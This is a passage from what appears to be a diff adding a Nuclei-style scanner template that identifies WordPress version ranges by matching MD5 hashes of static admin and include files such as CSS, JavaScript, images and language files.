"(\"8bef8c397f737a91ff8c4a2edbc16b36\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/list-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"68d5bb134953c23217fdd36982679a0c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/mask.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"fcf693677ea822e6d24af7b2e4a98e99\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"c6dc921c0d6f2197793d9174b4267ca0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wordpress-logo-white.svg" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"19bdd97150fb43aa862d53500c44e6f7\" == md5(body))" + - type: dsl + name: 3.8 - 4.4.24 + dsl: + - "(\"e1af633d59dcb5988cacff73b6dee9ff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/post-formats.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"dc4bffe1d10093e4d92533a8d60cba07\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"cf8cdb0bc623dee2e18898b44b11744c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wheel.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"4530bd2071306dbbc61a592556b958a0\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"18568b368b3c5dfe7b67017a1ac3d329\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"2b6d304868ff398c17252b7b0a0414c4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-editor-rtl.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"143da4e979fd86e002fba6cda338cf7c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"1cc17a3f6fab84d7f5cdafb9a1e48f09\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"90d7daa9fa832b6ee628d44bac2914ed\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - 
"(\"d4c4155fff66945ef367f81b9f007f23\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"681c587be87f8084fd15ce13b1460c8f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b5eafb27263420dc587154987eefd9dc\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"af4e88597b7bafef229d9cfd7f78a7f0\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"9dad58e09b0522a67f359c9d85cd15a1\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"51a6eccc0e58e41141b938c556e2b622\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"c6dcd57eb62b059f20223ca862046a02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"9407340fa00808af6c733322ccbe9a9e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"01ae9946e7a7a08c32f1261d031c0320\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"fa029d751a7e76496019bd3a5a69f039\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"69d21af7f06b1347a33b42916e7b08d2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"11cf82a7b3767ab36772ea1ac7dd2014\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"7e44b4a4422dc8db4efe76a8be193cb5\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"76d03147582cd99d51475f6bd651423d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"48180a7b52dd60bec1fc7a0ae2be0826\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-editor-rtl.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"464da848980476cd37de1c0d7964c1e4\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"9c1467e35e805d97da87d6df5b80f9c2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"8de2501460648d4cb12d23774d21dd5f\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/css/press-this-editor.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"2cf3344cb737ec622532596ac21cb85f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2c096e4ab4c7c797f2f2017ac1fb7d20\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/l10n.css" + matchers: + - type: dsl + name: 4.6 - 5.6 + dsl: + - "(\"b5c4b8f85029fb7c84f0719f72b280ad\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"a611aee8ff502b5e2e28ea7ad2a4c211\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"4cd680a0941c3452ba43a54fca56a406\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"5dda0b5411fecbe1fac83dfe21c7540e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"53825e0f13ec9497ea097b6d9d9ebf77\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"41ad7b492a52ebf1cc72d7d4f2f6dd2d\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ceae11d0b544effd0143146a689b60ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/farbtastic.css" + matchers: + - type: dsl + name: 3.8 - 5.6 + dsl: + - "(\"f9e33829b8faed7d7bbef843fb683255\" == md5(body))" + - type: dsl + name: 3.4 - 3.7.35 + dsl: + - "(\"90e8ee437da5a2fa7bd428a67182a198\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"b3e8340e402157e34c51510c2f192641\" == md5(body))" + - type: dsl + name: 2.7 - 3.2.1 + dsl: + - "(\"b45e420bae504bad3ad026f11fb34414\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-editor.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"b01941463721a9e3d36d4b4dc3781c66\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"d423a8f9152d19050b6020d0599e550b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"953fa7568d1de29bc722de0c8d27c59d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/light/colors.scss" + matchers: + - 
type: dsl + name: 4.3 - 5.6 + dsl: + - "(\"480b9bd647e5b323ef88d63ce55e1d6f\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"20a8567ba70294295c115f7ed9e071b7\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"d4534373ceb86fd1e1582d00de26bd81\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/blue/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"d9d03549d79484672c29145aad594db3\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"6220096c2fcaa516839e89b40744e911\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"5692871a8a7a1914ee0968ddf9923dec\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"11d1a9a671ccf4371372cc033a38e2d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"940171d1392bd8071122a905d12b9195\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"d09b41f68ac7247d47e79eaa6fb0e92c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/midnight/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"26dc8daaf0c47c4457b8bc2145f48634\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"0d287edc7631906fabaaeec46f540111\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/bookmarklet.min.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"a91cd95baeb66d4873dbe424b75970c3\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b220cfa4b7eddb2b7340bf022cd4b41c\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"b7ee968190e961f9aefeddac25543c45\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"07603898b017e6cc23f7a5b90c003314\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/js/farbtastic.js" + matchers: + - type: dsl + name: 3.1 - 5.6 + dsl: + - "(\"a73af354a03241715d8698feea340b92\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"ba2afcd06915d8d312f7140c464938c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/bookmarklet.js" + matchers: + - type: dsl + name: 4.3 - 4.8.15 + dsl: + - "(\"95c9ef35b76af2aceaf9d6c5958e8d43\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"599601c1e1bcbf766f466722e50cb06b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/press-this.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"ceec025d4710581c8a0986860c8dfac9\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"18c78fc40d75f973159700ac6bbdd83a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"5491b59c4e2758920d933adf8661b068\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"682e5b74d3791a9c09b8c5317f84aa4a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/press-this.js" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"f248f30a8a7d782d4e38962c8f0e6329\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"bac097de798345d068fd863c96b9ff41\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"91993a940f719edbe2ad8a259973527e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"9b4c722c56b2a7fa041c7a50f7019801\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"a881348ad82cd67fd3ede2686f8e9cfd\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"85199c05db63fcb5880de4af8be7b571\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"bedd695932ccf2f6c1d21471bf2e9228\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"dda0aa24705a5218d13e271c8c187cf7\" == md5(body))" + - method: GET + 
path: + - "{{BaseURL}}/wp-includes/css/wp-embed-template-ie.min.css" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"1aec3cac7756e9b405bcbf0ad39c7772\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"377b5750db4cf37b4897d918a90749e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/handlers.min.js" + matchers: + - type: dsl + name: 3.5.2 - 4.8.15 + dsl: + - "(\"96592c6b3fad580ce04e12bc3047ef3b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.1 + dsl: + - "(\"44b4f7cfec54b7fc8410a383257af538\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"6a8fbcda994be17e7109f588fcd8633d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/swfupload.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"6cd370bfd4d86c44ac155fd913e971ac\" == md5(body))" + - type: dsl + name: 4.0 - 4.6.20 + dsl: + - "(\"ef3ae9014525cf81187afaa61bca737e\" == md5(body))" + - type: dsl + name: 2.8 - 3.9.33 + dsl: + - "(\"603bd14299f61a7329b2d353b2b56c2f\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"79ada21b0ad56e6497057db7407c2480\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"2408a38cb26fd712e8cabee4da573075\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"ccd72399988bf939dce13e2659526711\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.form.js" + matchers: + - type: dsl + name: 3.7 - 4.8.15 + dsl: + - "(\"e5afd8e41d2ec22c19932b068cd90a71\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"1210dad363fcd0a43dc28244b69369f9\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"5b000ac69e0bc5325856cfe2ce588b88\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"958cc914d5beeebe517f7a1da5360ad5\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"2ff1a749aeaa2a874b8bd53960e982cc\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - 
"(\"820f80306571dbe0a1deb0b63496d85f\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"2bd31999f24a62d12a568fdbb8d43759\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"d08a6e3d69ffe1088166ae1983e2355d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/utils/mctabs.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0c3884be4fe9a43048f9c62d59dcda7f\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"b9b50ddbe07c754a6b656b0fdada3500\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"9f78248e9e0a64aa17f3062ce25099cb\" == md5(body))" + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"bd062418b6a7e5007649421815021565\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"80ef3cbbdea4cdb927d0b818fc936056\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"7727d6ef7c831c363ebfe40fc3f4e144\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"2a1823e4190de5b31bbfd48e51597448\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"84ef3a193d26119e8109afaae7a1c5e1\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"dfb2a3ae3f1f7d08232d64102bf6bf38\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"12a27164435afd5df1bbbb7eb3a15a01\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"eb81a1ec2259f9b1b4933e7855e5ada3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/farbtastic.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"30996981c129bd331b5cdbb88a2fa23b\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"23d55eb53a88478028930c82b13a6b0a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-icon.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"66a5336284db6dc9874764fa8548a471\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"1eb6581bc8d6bd4fc9c5b5d5a3f678df\" == 
md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"6c951fcb811b78da4a91c55447888f98\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-icon.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"02f37c95552dc7cda5e2ca3c4ef6ac20\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"51ef2e5d648fb9b7bb4c2b88cfd25519\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"17ca77d176cb8d49591f32eab4c55d00\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"8d0ea8f47d8c45b2a80211d470306c75\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/farbtastic-rtl.min.css" + matchers: + - type: dsl + name: 3.8 - 4.8.15 + dsl: + - "(\"1a884c09637a47af300c7e6c3057ddc2\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"d55340e3ce5b935c2cf0337c92b61521\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-icon-rtl.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"52189e8f1862001b7bd1f5f0ed71d30a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b7bfe7d9aefb4e687d1e62eb70d658ac\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"c5605f3fde843ddb7cf887a72b9464a8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/dailymotion.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"56dc9e4ca869b97225bcfc67152d234a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/soundcloud.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"8105bbb490f03094ec848fd4aaa986cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/facebook.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"7606b8a8ade2350f2dbff7e6ce992b1f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/twitch.js" + matchers: + - type: dsl + 
name: 4.9 - 4.9.1 + dsl: + - "(\"a5185612b657eb6423add5755cb8a2bb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/twitch.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"90a049a82b0cc9a3c76755988df52e09\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/dailymotion.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"e01f0763e423742e0e0afeae2e685260\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/soundcloud.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"559517962c6329e56bd38132ee7322c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/facebook.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"4fdb5c45851d105d37bb178126f4a59c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-video.swf" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"88aeb3b7a5f3961393ffe6eb649a3a48\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-migrate.js" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"3cb6030743925f687ad3043384ed3c37\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mejs-controls.svg" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"f0849a5e79712b10e1531925e3edb879\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-video-hls.swf" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"b2dc69c327348b4774bcefb6f8aa0408\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-video-mdash.swf" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"dc64796b1bb9f9a40f5f2f874e821266\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-audio.swf" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"b56f0ff117c8eb507f1df12dc88663c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-audio-ogg.swf" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"c8890c74d2c904afd97022d20072f2b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mejs-controls.png" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"872edbb75a23651c30bf3ca06c9690bf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ko.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"96157f9a2d582a9b2f9d2d9036b91b69\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/pt.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"a9088bc020ad452490c511935e0b7d2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ru.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"12a4ed71d1eafbc02fae603e56c1892b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ro.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"d6326bd53b37582446b9789c30220193\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ca.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"27eaf272c68d547118ee6210c844bda6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/uk.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"ab2374f9cf8189d04fe13da19ebfa70e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/zh.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"cc7e0a8399c10d2a5df12c5d00154dec\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/mediaelement/lang/ja.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"4b8f8f808a309dde6b7e9aef47b82a1f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/sv.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"13e15568b725b19b00469af61d239bc2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/es.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"bf5210c36107656b88bc010cf5c0a8a0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/nl.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"e2b8cba3dfcaf15dd32a28f52189ceba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/hr.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"862f150e2db5c2ef846a7a3296a67afd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/sk.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"b78e3fe643f1b04fd6b29cd76364ca89\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/hu.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"76ae0adf33f34cb9463e93b9e9e3069d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/zh-cn.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"5849066af233ae91cfc34700bb02d1b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/cs.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"cb39cbf670a82d0e52d40a9115c50149\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/fa.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"a738d9563af8c9f240c770422abab6d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/it.js" + matchers: + - type: 
dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"fd9c90d0291ab3a774d39556b7646c68\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/pl.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"94c0b3258c5a3b0241789c01321fd292\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/fr.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"cb69c7b0e31b37817f75bcaf446ec91a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/de.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"eb110dabd02486e1f838b4b317f18487\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/moxie.js" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"8923430da19a35c7b1efc792b681fc9a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/htmlhint.js" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"b532ec7cd19faf478c4d740b5035a7ea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/codemirror.min.css" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"a632336ab79ded318dc02844c4faf3b5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/jshint.js" + matchers: + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"fa622859a12fe91067429a01c8158a04\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"9d84f61dfb50fa0321ec52716301cdca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/jsonlint.js" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"49296679dee36b0c548c2bcaed3cd59f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/codemirror.min.js" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"f2d20913fc0766828268883b66af71ec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/htmlhint-kses.js" + 
matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"eefd81f25baeb66b5bf323634c667b1b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"5c509ea150c4abff1c5a288de7299c41\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"7e86c1cecc74753dcc8b63784c0815a3\" == md5(body))" + - type: dsl + name: 4.1 - 4.7.3 + dsl: + - "(\"1581bb02286f54b4fb0cce52d2ef61c7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"6956d77a2747ec8129e0c6f7bcfb1ced\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"cdb6a59abe551818e8a3a6d61b68e00e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/hr/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"a0a566612a12ce9069e89054bf2559b3\" == md5(body))" + - type: dsl + name: 4.7.4 